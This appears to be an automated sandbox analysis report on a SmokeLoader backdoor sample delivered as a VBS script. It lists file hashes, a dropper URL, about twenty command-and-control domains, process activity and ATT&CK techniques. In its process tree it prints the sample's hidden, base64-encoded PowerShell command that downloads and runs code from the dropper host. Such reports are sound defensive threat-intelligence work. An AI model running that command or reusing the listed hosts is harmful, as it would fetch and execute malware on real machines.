smokeloader | 24412f9b29d01c40e1ba7dc688b347f3343727633e5242eeaaf517d99db31a4d

General

Target

375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936.vbs
Size

22KB
MD5

642917731c4f19a1b7a1fab2333a84d2
SHA1

742e8e1701b03a0638eec505e17ad453a612ac5e
SHA256

375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936
SHA512

e27262555ca391e255200f5da4421ebd991ed1ff6399e82ed5f0ef76ced2d6e508fa96d4d23c62901e4eb55c21f0e131713669f1a39351ea1e4836c9cea593dd
SSDEEP

384:Ym0ICzXSsFmDFFlhPAO0SBVNKemRJ0pIu+5B70VVa4EdPBS0d928DYGm3Mq:Y7UZL0ouNia4y7/sVL

Score

10^/10

smokeloader backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://americanocoffea.ru

Extracted

Family

smokeloader

Version

2022

C2

http://polinamailserverip.ru/

http://lamazone.site/

http://criticalosl.tech/

http://maximprofile.net/

http://zaliphone.com/

http://humanitarydp.ug/

http://zaikaopentra.com.ug/

http://zaikaopentra-com-ug.online/

http://infomalilopera.ru/

http://jskgdhjkdfhjdkjhd844.ru/

http://jkghdj2993jdjjdjd.ru/

http://kjhgdj99fuller.ru/

http://azartnyjboy.com/

http://zalamafiapopcultur.eu/

http://hopentools.site/

http://kismamabeforyougo.com/

http://kissmafiabeforyoudied.eu/

http://gondurasonline.ug/

http://nabufixservice.name/

http://filterfullproperty.ru/

rc4.i32

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

2 4260 powershell.exe
4 4260 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

MhxDHvaX.exe

pid process

4856 MhxDHvaX.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
2	4260	powershell.exe
4	4260	powershell.exe

pid	process
4856	MhxDHvaX.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

MhxDHvaX.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MhxDHvaX.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MhxDHvaX.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MhxDHvaX.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeMhxDHvaX.exe

pid	process
4260	powershell.exe
4260	powershell.exe
4260	powershell.exe
4856	MhxDHvaX.exe
4856	MhxDHvaX.exe
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164
3164

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3164
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

MhxDHvaX.exe

pid process

4856 MhxDHvaX.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4260 powershell.exe
Token: SeShutdownPrivilege 3164
Token: SeCreatePagefilePrivilege 3164

pid	process
3164

pid	process
4856	MhxDHvaX.exe

description	pid	process
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeShutdownPrivilege	3164
Token: SeCreatePagefilePrivilege	3164

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

WScript.execmd.exepowershell.exe

description	pid	process	target process
PID 4024 wrote to memory of 3436	4024	WScript.exe	cmd.exe
PID 4024 wrote to memory of 3436	4024	WScript.exe	cmd.exe
PID 3436 wrote to memory of 4260	3436	cmd.exe	powershell.exe
PID 3436 wrote to memory of 4260	3436	cmd.exe	powershell.exe
PID 4260 wrote to memory of 4856	4260	powershell.exe	MhxDHvaX.exe
PID 4260 wrote to memory of 4856	4260	powershell.exe	MhxDHvaX.exe
PID 4260 wrote to memory of 4856	4260	powershell.exe	MhxDHvaX.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYQBtAGUAcgBpAGMAYQBuAG8AYwBvAGYAZgBlAGEALgByAHUAIgApAA==
2⤵
- Suspicious use of WriteProcessMemory
PID:3436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYQBtAGUAcgBpAGMAYQBuAG8AYwBvAGYAZgBlAGEALgByAHUAIgApAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4260

C:\Users\Admin\AppData\Local\Temp\MhxDHvaX.exe
"C:\Users\Admin\AppData\Local\Temp\MhxDHvaX.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4856

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

2

T1082

Query Registry

2

T1012

Peripheral Device Discovery

1

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MhxDHvaX.exe
Filesize
274KB

MD5
1f95b8c2dc09a84f6a9fe6f74dbf7d96

SHA1
35f2c55596e43c2887d70a172d452fc5ac36835d

SHA256
9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330

SHA512
7d7bf42a7df0ec4dcf0f8ac891bee60871ddc45c9887d8b5022dcddc27fae7afdd2134370f1a5ac898c364c5d702e9fb84b496d7c8a253fefd96d65715ba563c

Download Submit
C:\Users\Admin\AppData\Local\Temp\MhxDHvaX.exe
Filesize
274KB

MD5
1f95b8c2dc09a84f6a9fe6f74dbf7d96

SHA1
35f2c55596e43c2887d70a172d452fc5ac36835d

SHA256
9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330

SHA512
7d7bf42a7df0ec4dcf0f8ac891bee60871ddc45c9887d8b5022dcddc27fae7afdd2134370f1a5ac898c364c5d702e9fb84b496d7c8a253fefd96d65715ba563c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tjal132m.zgk.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\vbujsju
Filesize
274KB

MD5
1f95b8c2dc09a84f6a9fe6f74dbf7d96

SHA1
35f2c55596e43c2887d70a172d452fc5ac36835d

SHA256
9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330

SHA512
7d7bf42a7df0ec4dcf0f8ac891bee60871ddc45c9887d8b5022dcddc27fae7afdd2134370f1a5ac898c364c5d702e9fb84b496d7c8a253fefd96d65715ba563c

Download Submit
memory/3164-166-0x0000000001410000-0x0000000001426000-memory.dmp

Filesize
88KB

Download
memory/4260-125-0x00000168405F0000-0x0000016840612000-memory.dmp

Filesize
136KB

Download
memory/4260-128-0x0000016827EE0000-0x0000016827EF0000-memory.dmp

Filesize
64KB

Download
memory/4260-130-0x0000016827EE0000-0x0000016827EF0000-memory.dmp

Filesize
64KB

Download
memory/4260-132-0x00000168406A0000-0x0000016840716000-memory.dmp

Filesize
472KB

Download
memory/4260-147-0x0000016827EE0000-0x0000016827EF0000-memory.dmp

Filesize
64KB

Download
memory/4856-165-0x0000000000800000-0x0000000000809000-memory.dmp

Filesize
36KB

Download
memory/4856-167-0x0000000000400000-0x000000000068A000-memory.dmp

Filesize
2.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads